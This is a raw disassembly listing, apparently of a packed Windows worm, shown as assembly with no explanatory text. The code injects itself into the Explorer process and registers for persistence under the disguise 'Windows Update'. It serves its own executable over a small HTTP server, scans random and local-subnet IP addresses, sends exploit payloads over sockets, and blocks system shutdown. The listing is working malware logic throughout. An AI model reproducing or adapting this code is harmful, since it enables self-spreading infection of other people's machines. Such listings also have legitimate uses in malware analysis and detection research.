call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3090116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D1D
push 0
push 0DEh
push offset dword_309046B8
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3090116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D1D
cmp eax, 46h
jl loc_30901D1D
cmp [ebp+var_730], 31h
jnz loc_30901BC8
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_30902CA6 ; memset
add esp, 0Ch
push offset byte_309042B8
call dword_30901084 ; lstrlen
push eax
lea eax, [ebp+var_EA4]
push offset byte_309042B8
push eax
call sub_30902CB2 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_30901084 ; lstrlen
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_30902CB2 ; memcpy
mov eax, dword_30904BBE
add esp, 0Ch
mov [ebp+var_798], eax
loc_30901A69: ; CODE XREF: sub_309017D2+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3090116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D1D
push 0
push 68h
push offset dword_309047FC
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3090116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D1D
push 0
push 0A0h
push offset dword_30904868
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3090116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D1D
cmp [ebp+arg_0], 0
jz loc_30901CB8
push 68h
lea eax, [ebp+var_89E4]
push offset dword_30904A20
push eax
call sub_30902CB2 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_30902CB2 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_30904A8C
push eax
call sub_30902CB2 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_30902CB2 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_30904B00
push eax
call sub_30902CB2 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3090116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D1D
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_30901D10
; ---------------------------------------------------------------------------
loc_30901BC8: ; CODE XREF: sub_309017D2+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_30902CA6 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_30904BF8
push eax
call sub_30902CB2 ; memcpy
push offset byte_309042B8
call sub_30902CAC ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_309042B8
push eax
call sub_30902CB2 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_30904C70
push eax
call sub_30902CB2 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_30904BF8
push eax
call sub_30902CB2 ; memcpy
add esp, 40h
push offset byte_309042B8
call sub_30902CAC ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_309042B8
push eax
call sub_30902CB2 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_30901C64: ; CODE XREF: sub_309017D2+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_30901C64
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_30902CA6 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_30902CA6 ; memset
add esp, 18h
jmp loc_30901A69
; ---------------------------------------------------------------------------
loc_30901CB8: ; CODE XREF: sub_309017D2+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_3090490C
push eax
call sub_30902CB2 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_30902CB2 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_3090498C
push eax
call sub_30902CB2 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_30901D10: ; CODE XREF: sub_309017D2+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_30901D1D: ; CODE XREF: sub_309017D2+1AD�j
; sub_309017D2+1E1�j ...
push 2
push [ebp+var_4]
call dword_30901170 ; shutdown
loc_30901D28: ; CODE XREF: sub_309017D2+166�j
push [ebp+var_4]
call dword_30901174 ; closesocket
pop esi
loc_30901D32: ; CODE XREF: sub_309017D2+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_309017D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901D39 proc near ; CODE XREF: UPX0:loc_30902347�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_309010A8 ; LoadLibraryA
mov esi, dword_309010A4
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_30901DBD
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_30901DBD
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_30901DBD
lea eax, [ebp+var_C]
push eax
push 20h
call dword_309010A0 ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_30901DBD: ; CODE XREF: sub_30901D39+28�j
; sub_30901D39+37�j ...
pop edi
pop esi
leave
retn
sub_30901D39 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901DC1 proc near ; CODE XREF: UPX0:3090235B�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_30904FD0
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_309010B4 ; GetModuleHandleA
mov esi, dword_309010A4
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_30901E08
loc_30901E04: ; CODE XREF: sub_30901DC1+54�j
push 1
jmp short loc_30901E59
; ---------------------------------------------------------------------------
loc_30901E08: ; CODE XREF: sub_30901DC1+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_30901E04
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_30901110 ; FindWindowA
test eax, eax
jnz short loc_30901E36
call dword_30901114 ; GetForegroundWindow
test eax, eax
jnz short loc_30901E36
push 2
jmp short loc_30901E59
; ---------------------------------------------------------------------------
loc_30901E36: ; CODE XREF: sub_30901DC1+65�j
; sub_30901DC1+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_30901118 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_309010B0 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_30901E5C
push 3
loc_30901E59: ; CODE XREF: sub_30901DC1+45�j
; sub_30901DC1+73�j
pop eax
jmp short loc_30901EC7
; ---------------------------------------------------------------------------
loc_30901E5C: ; CODE XREF: sub_30901DC1+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_3090107C
test eax, eax
jz short loc_30901EBA
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_309010AC ; WriteProcessMemory
push dword_30904FC4
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_30901EA6
push eax
call esi ; CloseHandle
jmp short loc_30901EC1
; ---------------------------------------------------------------------------
loc_30901EA6: ; CODE XREF: sub_30901DC1+DE�j
push offset aUterm17 ; "uterm17"
call sub_30901EFA
pop ecx
mov [ebp+var_4], 5
jmp short loc_30901EC1
; ---------------------------------------------------------------------------
loc_30901EBA: ; CODE XREF: sub_30901DC1+B2�j
mov [ebp+var_4], 4
loc_30901EC1: ; CODE XREF: sub_30901DC1+E3�j
; sub_30901DC1+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_30901EC7: ; CODE XREF: sub_30901DC1+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_30901DC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901ECC proc near ; CODE XREF: sub_30902195+B�p
; UPX0:3090231D�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_309010B8 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_309010EC ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_30901ECC endp
; =============== S U B R O U T I N E =======================================
sub_30901EFA proc near ; CODE XREF: sub_30901DC1+EA�p
; UPX0:30902327�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_309010BC ; CreateMutexA
retn
sub_30901EFA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901F09 proc near ; CODE XREF: sub_30902383+15B�p
; sub_30902383+166�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_309010C0 ; CreateThread
pop ebp
retn
sub_30901F09 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901F23 proc near ; CODE XREF: sub_30902195+12C�p
; sub_3090259A+5A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_309010C0 ; CreateThread
push eax
call dword_3090107C ; CloseHandle
pop ebp
retn
sub_30901F23 endp
; =============== S U B R O U T I N E =======================================
sub_30901F44 proc near ; CODE XREF: sub_309011A0+68�p
; sub_30902A6B+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_30901F6C
loc_30901F55: ; CODE XREF: sub_30901F44+26�j
call dword_309010FC ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_30901F55
loc_30901F6C: ; CODE XREF: sub_30901F44+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_30901F44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901F74 proc near ; CODE XREF: sub_309011A0+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_30902CA6 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_309010C4 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_3090107C
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_30901F74 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901FCA proc near ; CODE XREF: sub_30902622+3E�p
; sub_309026E9+7�p ...
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_3090114C ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_30901FEB
call dword_30901150 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_30901FEB: ; CODE XREF: sub_30901FCA+15�j
lea eax, [ebp+var_34]
push eax
call dword_30901154 ; gethostbyname
test eax, eax
jnz short loc_30902000
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_30902000: ; CODE XREF: sub_30901FCA+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_30901FCA endp
; =============== S U B R O U T I N E =======================================
sub_30902009 proc near ; CODE XREF: sub_30902536+22�p
; sub_3090259A+27�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_30901130 ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_30902009 endp
; =============== S U B R O U T I N E =======================================
sub_3090201F proc near ; CODE XREF: sub_30902383+40�p
; sub_30902383+4C�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_309010CC ; OpenEventA
test eax, eax
jz short locret_30902038
push eax
call dword_309010C8 ; SetEvent
locret_30902038: ; CODE XREF: sub_3090201F+10�j
retn
sub_3090201F endp
; =============== S U B R O U T I N E =======================================
sub_30902039 proc near ; CODE XREF: sub_3090169C+30�p
push esi
mov esi, dword_309010FC
push edi
call esi ; rand
mov edi, eax
shl edi, 10h
call esi ; rand
or eax, edi
pop edi
pop esi
retn
sub_30902039 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090204F proc near ; DATA XREF: sub_30902195+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_3090116C ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_30902080
push 1
jmp loc_3090213B
; ---------------------------------------------------------------------------
loc_30902080: ; CODE XREF: sub_3090204F+28�j
mov esi, dword_30901104
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_3090214B
lea eax, [ebp+var_100]
push offset dword_309041F0
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_3090214B
mov esi, dword_30901168
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; send
push dword_30904FC0
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_3090111C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_30902CAC ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; send
loc_309020FD: ; CODE XREF: sub_3090204F+E8�j
mov eax, dword_30904FC0
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_3090210F
mov eax, ecx
loc_3090210F: ; CODE XREF: sub_3090204F+BC�j
test eax, eax
jz short loc_3090213E
push 0
push eax
mov eax, dword_30904FB8
add eax, edi
push eax
push ebx
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_30902139
cmp eax, 1000h
jb short loc_3090213E
push 64h
add edi, eax
call dword_30901094 ; Sleep
jmp short loc_309020FD
; ---------------------------------------------------------------------------
loc_30902139: ; CODE XREF: sub_3090204F+D5�j
push 2
loc_3090213B: ; CODE XREF: sub_3090204F+2C�j
pop eax
jmp short loc_3090218E
; ---------------------------------------------------------------------------
loc_3090213E: ; CODE XREF: sub_3090204F+C2�j
; sub_3090204F+DC�j
push offset dword_30904FBC
call dword_309010D4 ; InterlockedIncrement
jmp short loc_30902169
; ---------------------------------------------------------------------------
loc_3090214B: ; CODE XREF: sub_3090204F+49�j
; sub_3090204F+61�j
mov esi, dword_30901168
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; send
push 0
push 3
push offset dword_30904D38
push ebx
call esi ; send
loc_30902169: ; CODE XREF: sub_3090204F+FA�j
push 7D0h
call dword_30901094 ; Sleep
push 2
push ebx
call dword_30901170 ; shutdown
push ebx
call dword_30901174 ; closesocket
push 0
call dword_309010D0 ; ExitThread
xor eax, eax
loc_3090218E: ; CODE XREF: sub_3090204F+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_3090204F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902195 proc near ; DATA XREF: sub_30902383+156�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_30901ECC
lea eax, [ebp+var_130]
push 104h
push eax
push offset aWindowsUpdate ; "Windows Update"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_30904FBC, ebx
call sub_30902859
add esp, 14h
test eax, eax
jnz loc_309022CA
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_30901080 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_30902201
push 1
call dword_309010D0 ; ExitThread
loc_30902201: ; CODE XREF: sub_30902195+62�j
push ebx
push esi
call dword_309010DC ; GetFileSize
push eax
mov dword_30904FC0, eax
call sub_30902C75
pop ecx
mov dword_30904FB8, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_30904FC0
push eax
push esi
call dword_309010D8 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_30904FC0, eax
call dword_3090107C ; CloseHandle
push ebx
push 1
push 2
call dword_30901158 ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_30902CA6 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_30902263: ; CODE XREF: sub_30902195+E5�j
; sub_30902195+ED�j ...
call dword_309010FC ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov dword_30904FCC, eax
jz short loc_30902263
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_30902263
push eax
call dword_30901160 ; htons
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_30901140 ; bind
test eax, eax
jnz short loc_30902263
push 64h
push edi
call dword_30901144 ; listen
mov [ebp+var_8], esi
pop esi
loc_309022AC: ; CODE XREF: sub_30902195+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_30901148 ; accept
push eax
push offset sub_3090204F
call sub_30901F23
pop ecx
pop ecx
jmp short loc_309022AC
; ---------------------------------------------------------------------------
loc_309022CA: ; CODE XREF: sub_30902195+3D�j
push ebx
call dword_309010D0 ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_30902195 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309022D9 proc near ; CODE XREF: sub_30902383:loc_309024D3�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3090113C
push eax
push 2
call esi ; WSAStartup
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; WSAStartup
pop esi
leave
retn
sub_309022D9 endp
; ---------------------------------------------------------------------------
loc_30902305: ; CODE XREF: UPX1:30906C68�j
push 0
call dword_309010B4 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov dword_30904FD0, eax
call dword_30901074 ; DeleteFileA
call sub_30901ECC
push offset aUterm17 ; "uterm17"
call sub_30901EFA
pop ecx
mov dword_30904FC4, eax
call dword_309010E4 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_30902347
push 1
call dword_309010E0 ; ExitProcess
loc_30902347: ; CODE XREF: UPX0:3090233D�j
call sub_30901D39
call sub_309029BD
call sub_30902B37
push offset sub_30902383
call sub_30901DC1
test eax, eax
pop ecx
jz short loc_3090236C
push 0
call sub_30902383
loc_3090236C: ; CODE XREF: UPX0:30902363�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_3090236F proc near ; CODE XREF: sub_30902383:loc_309024FC�p
; sub_30902536:loc_3090254F�p ...
push 0
push dword_30904FC8
call dword_30901070 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_3090236F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902383 proc near ; CODE XREF: UPX0:30902367�p
; DATA XREF: UPX0:30902356�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_30901190
push offset loc_30902CA0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
push offset aU17x ; "u17x"
xor edi, edi
push edi
push 1
push edi
call dword_3090106C ; CreateEventA
mov dword_30904FC8, eax
mov [ebp+var_4], edi
push offset aU10x ; "u10x"
call sub_3090201F
mov [esp+0Ch+var_C], offset aU11x ; "u11x"
call sub_3090201F
mov [esp+0Ch+var_C], offset aU12x ; "u12x"
call sub_3090201F
mov [esp+0Ch+var_C], offset aU13x ; "u13x"
call sub_3090201F
mov [esp+0Ch+var_C], offset aU14x ; "u14x"
call sub_3090201F
mov [esp+0Ch+var_C], offset aU15x ; "u15x"
call sub_3090201F
mov [esp+0Ch+var_C], offset aU16x ; "u16x"
call sub_3090201F
mov [esp+0Ch+var_C], offset aU8 ; "u8"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU9 ; "u9"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU10 ; "u10"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU11 ; "u11"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU12 ; "u12"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU13 ; "u13"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU13i ; "u13i"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU14 ; "u14"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU15 ; "u15"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU16 ; "u16"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU17 ; "u17"
call sub_30901EFA
pop ecx
cmp [ebp+arg_0], edi
jz short loc_309024D3
push offset aWs2_32 ; "ws2_32"
mov esi, dword_309010A8
call esi ; LoadLibraryA
push offset aWininet ; "wininet"
call esi ; LoadLibraryA
push offset aMsvcrt ; "msvcrt"
call esi ; LoadLibraryA
push offset aAdvapi32 ; "advapi32"
call esi ; LoadLibraryA
push offset aUser32 ; "user32"
call esi ; LoadLibraryA
push offset aUterm17 ; "uterm17"
call sub_30901EFA
pop ecx
mov dword_30904FC4, eax
loc_309024D3: ; CODE XREF: sub_30902383+115�j
call sub_309022D9
push edi
push offset sub_30902195
call sub_30901F09
push edi
push offset sub_3090169C
call sub_30901F09
push edi
push offset loc_30902745
call sub_30901F09
add esp, 18h
loc_309024FC: ; CODE XREF: sub_30902383+194�j
call sub_3090236F
test eax, eax
jnz short loc_30902519
push edi
call dword_30901018 ; AbortSystemShutdownA
push 1388h
call dword_30901094 ; Sleep
jmp short loc_309024FC
; ---------------------------------------------------------------------------
loc_30902519: ; CODE XREF: sub_30902383+180�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_2
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_30902383 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902536 proc near ; DATA XREF: sub_3090259A+55�o
; sub_30902622+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_30902545
push 1
pop eax
jmp short locret_30902596
; ---------------------------------------------------------------------------
loc_30902545: ; CODE XREF: sub_30902536+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_3090254F: ; CODE XREF: sub_30902536+5A�j
call sub_3090236F
test eax, eax
jnz short loc_30902592
call sub_30902009
test eax, eax
jz short loc_30902592
cmp [ebp+var_1], bl
jz short loc_3090258B
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_309017D2
movzx esi, word_30904FDC
pop ecx
call dword_309010FC ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_30901094 ; Sleep
loc_3090258B: ; CODE XREF: sub_30902536+2E�j
inc bl
cmp bl, 0FFh
jb short loc_3090254F
loc_30902592: ; CODE XREF: sub_30902536+20�j
; sub_30902536+29�j
pop esi
xor eax, eax
pop ebx
locret_30902596: ; CODE XREF: sub_30902536+D�j
leave
retn 4
sub_30902536 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090259A proc near ; DATA XREF: sub_30902622+7E�o
; UPX0:309027DA�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_309025A8
push 1
pop eax
jmp short loc_3090261E
; ---------------------------------------------------------------------------
loc_309025A8: ; CODE XREF: sub_3090259A+7�j
push ebx
push esi
push edi
call sub_30901ECC
mov esi, dword_309010FC
xor ebx, ebx
loc_309025B8: ; CODE XREF: sub_3090259A+7D�j
call sub_3090236F
test eax, eax
jnz short loc_30902619
call sub_30902009
test eax, eax
jz short loc_30902619
call esi ; rand
mov byte ptr [ebp+arg_0+2], al
call esi ; rand
push offset dword_30904FD4
mov byte ptr [ebp+arg_0+3], al
call dword_309010D4 ; InterlockedIncrement
push [ebp+arg_0]
call sub_309017D2
test eax, eax
pop ecx
jnz short loc_309025FB
push [ebp+arg_0]
push offset sub_30902536
call sub_30901F23
pop ecx
pop ecx
loc_309025FB: ; CODE XREF: sub_3090259A+50�j
movzx edi, word_30904FDC
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call dword_30901094 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_309025B8
loc_30902619: ; CODE XREF: sub_3090259A+25�j
; sub_3090259A+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_3090261E: ; CODE XREF: sub_3090259A+C�j
pop ebp
retn 4
sub_3090259A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902622 proc near ; DATA XREF: UPX0:309027F2�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_30901ECC
call sub_3090236F
test eax, eax
jnz loc_309026DB
push ebx
mov ebx, dword_30901094
push esi
mov esi, dword_309010FC
push edi
loc_30902648: ; CODE XREF: sub_30902622+48�j
; sub_30902622+B0�j
call esi ; rand
mov byte ptr [ebp+var_4+1], al
call esi ; rand
mov byte ptr [ebp+var_4+3], al
call esi ; rand
mov byte ptr [ebp+var_4+2], al
loc_30902657: ; CODE XREF: sub_30902622+3C�j
call esi ; rand
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_30902657
call sub_30901FCA
mov edi, [ebp+var_4]
